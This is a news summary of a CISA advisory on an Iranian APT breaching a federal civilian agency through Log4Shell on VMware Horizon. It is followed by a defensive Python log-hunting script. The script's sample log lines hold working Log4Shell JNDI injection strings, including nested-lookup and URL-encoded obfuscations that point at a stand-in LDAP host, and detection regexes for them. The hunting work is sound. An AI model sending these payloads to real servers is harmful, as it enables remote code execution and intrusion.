The U.S. CISA disclosed that an Iranian government-sponsored APT group hacked the Federal Civilian Executive Branch (FCEB).
The breach, which dates to February, was first detected in mid-June, and CISA conducted an incident response engagement with the FCEB through mid-July.
The Iranian hackers gained access to the network through an unpatched VMware Horizon server using the Log4Shell vulnerability. The FTC, itself an FCEB member, had warned in January that it would take legal action against companies that did not patch the vulnerability.
After gaining access, the actors installed the XMRig crypto-mining software, moved laterally to the domain controller, compromised credentials, and then installed reverse proxies on several hosts to maintain persistence.
CISA had previously warned on June 23 that malicious cyber actors were continuing to exploit Log4Shell in VMware Horizon systems, but it was not known at the time that the warning referred specifically to the FCEB compromise. The warning came days after CISA would have discovered that the FCEB had been compromised.
CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat-hunting activities.
If suspected initial access or compromise is detected based on indicators of compromise or tactics, techniques and procedures described in this Cybersecurity Advisory, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems, and audit privileged accounts.
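As an added defender-side illustration of the threat hunting the advisory calls for (example code written here, not from CISA's advisory or this page), the following Python script scans Apache-style access-log lines for Log4Shell JNDI lookups, collapsing the URL-encoded and nested-lookup obfuscation (such as `${${lower:j}ndi:...}`) that plain string matching misses. The log lines, client addresses and paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost lookup that is not itself ${jndi:...}: those are the target, not obfuscation noise.
INNER_LOOKUP = re.compile(r"\$\{(?!jndi:)([^${}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)

def _resolve(match: re.Match) -> str:
    """Evaluate one simple Log4j lookup the way attackers use it to hide the string 'jndi'."""
    body = match.group(1)
    if ":-" in body:  # ${anything:-default} evaluates to the default value
        return body.split(":-", 1)[1]
    kind, _, value = body.partition(":")
    if kind.lower() == "lower":
        return value.lower()
    if kind.lower() == "upper":
        return value.upper()
    return ""  # env:, sys:, etc. without a default: treat as empty for hunting purposes

def normalize(payload: str) -> str:
    """URL-decode, then collapse nested lookups until the text stops changing."""
    text = unquote(payload)
    while True:
        collapsed = INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            return text
        text = collapsed

def find_log4shell_attempts(log_text: str) -> list[dict]:
    """One record per access-log line whose normalized form contains a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        found = JNDI_LOOKUP.search(normalize(line))
        if found:
            hits.append({"line": number, "src_ip": line.split(" ", 1)[0],
                         "lookup": found.group(0)})
    return hits

# Constructed sample lines (not from the advisory); 198.51.100.0/24 is documentation address space.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2022:03:14:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Feb/2022:03:14:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [12/Feb/2022:03:14:11 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}${env:NOPE:-d}i:${lower:L}DAP://198.51.100.7:1389/a}"
10.0.0.9 - - [12/Feb/2022:03:14:13 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A//198.51.100.7/x%7D HTTP/1.1" 404 0 "-" "curl/7.68"
"""

if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        print(hit)
```

Hits from this hunt are a trigger to check the VMware Horizon host for the post-exploitation activity described above (unexpected miner processes, new reverse-proxy binaries, and credential use from that host toward the domain controller).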